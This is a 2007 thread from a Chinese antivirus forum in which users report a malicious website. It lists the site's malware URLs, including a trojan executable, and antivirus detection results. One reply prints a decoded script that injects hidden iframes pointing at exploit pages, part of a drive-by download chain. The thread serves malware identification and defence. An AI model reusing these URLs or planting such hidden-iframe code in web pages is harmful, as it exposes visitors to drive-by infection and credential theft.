查看: 3422|回复: 10
收起左侧

[已鉴定] 毒网

 关闭 [复制链接]
yitp
发表于 2007-11-5 11:47:52 | 显示全部楼层 |阅读模式
yitp
 楼主| 发表于 2007-11-5 11:50:24 | 显示全部楼层
卡巴报下载
wanglaoban
发表于 2007-11-5 12:01:49 | 显示全部楼层
http://www.5ibsj.com/kk/wm.htm
KAV6 - detected: Trojan program Trojan-Downloader.JS.Agent.gm        File: C:\Downloads\wm.htm
wanglaoban
发表于 2007-11-5 12:04:23 | 显示全部楼层
http://www.5ibsj.com/kk/xp14.htm
http://www.5ibsj.com/kk/xppp.htm
http://www.mpc88.com/mc/kg.exe
kav6 - detected: Trojan program Trojan-PSW.Win32.OnLineGames.eop        File: C:\Downloads\kg.exe
pmj_sh
发表于 2007-11-5 17:30:03 | 显示全部楼层
检测到病毒: Trojan-Downloader.JS.Agent.gm
文件: wm[1].htm

检测到病毒: Trojan-Downloader.JS.Psyme.qj
文件: xp14[1].htm
孤独更可靠
发表于 2007-11-5 17:57:11 | 显示全部楼层
XXTEA+base64加密

解后得:

<SCRIPT language="javascript">
document.write("<i"+"frame style='display:none;' src=xp14.htm width=10 height=10

frameborder=0></i"+"frame>");
document.write("<i"+"frame style='display:none;' src=xppp.htm width=10 height=10

frameborder=0></i"+"frame>");
</SCRIPT>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>

[:27:]

下面那2个子框架无法执行
rasis
发表于 2007-11-5 18:14:06 | 显示全部楼层
xp14.htm
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML

xppp.htm
      [DETECTION] Contains detection pattern of the HTML script virus HTML/Shellcode.Gen

kg.exe
      [DETECTION] Is the Trojan horse TR/CrashSystem.C
曲中求
发表于 2007-11-5 18:56:08 | 显示全部楼层
看了一下。。
1.JPG
a256886572008
发表于 2007-11-5 19:08:47 | 显示全部楼层












qigang
发表于 2007-11-5 19:25:43 | 显示全部楼层
瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.DL.Script.VBS.Agent.xgp

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.17.01
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 17:58 , Processed in 0.148083 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表